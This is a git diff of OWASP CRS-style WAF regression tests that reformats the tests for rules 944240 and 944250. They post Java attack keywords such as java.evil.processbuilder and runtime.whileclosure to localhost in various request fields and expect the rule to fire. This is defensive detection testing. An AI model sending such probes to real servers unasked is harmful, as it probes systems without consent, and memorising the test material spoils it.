runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_id: 76 desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeserializationfactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log_contains: "id \"944240\"" + - test_id: 77 desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 78 desc: "Argument test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_id: 79 desc: "Argument name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log_contains: "id \"944240\"" + - test_id: 80 desc: "Cookie test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 81 desc: "Cookie name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 82 desc: "Request header test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 83 desc: "XML attribute value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 84 desc: "XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_id: 85 desc: "Nested XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_id: 86 desc: "Content-Type text/plain includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_id: 87 desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.whileclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log_contains: "id \"944240\"" + - test_id: 88 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.whileclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index b8b744b16..e01631dc0 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml @@ -1,453 +1,430 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944250.yaml" description: "Positive tests for rule 944250" +rule_id: 944250 tests: - - test_title: 944250-1 + - test_id: 1 desc: "Argument test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_id: 2 desc: "Argument name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log_contains: "id \"944250\"" + - test_id: 3 desc: "Cookie test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 4 desc: "Cookie name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 5 desc: "Request header test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 6 desc: "XML attribute value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_id: 7 desc: "XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_id: 8 desc: "Nested XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_id: 9 desc: "Content-Type text/plain includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_id: 10 desc: "Content-Type application/json arg value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.runtime\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log_contains: "id \"944250\"" + - test_id: 11 desc: "Content-Type application/json arg name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.runtime\": \"test\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log_contains: "id \"944250\"" + - test_id: 12 desc: "Argument test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_id: 13 desc: "Argument name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log_contains: "id \"944250\"" + - test_id: 14 desc: "Cookie test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id 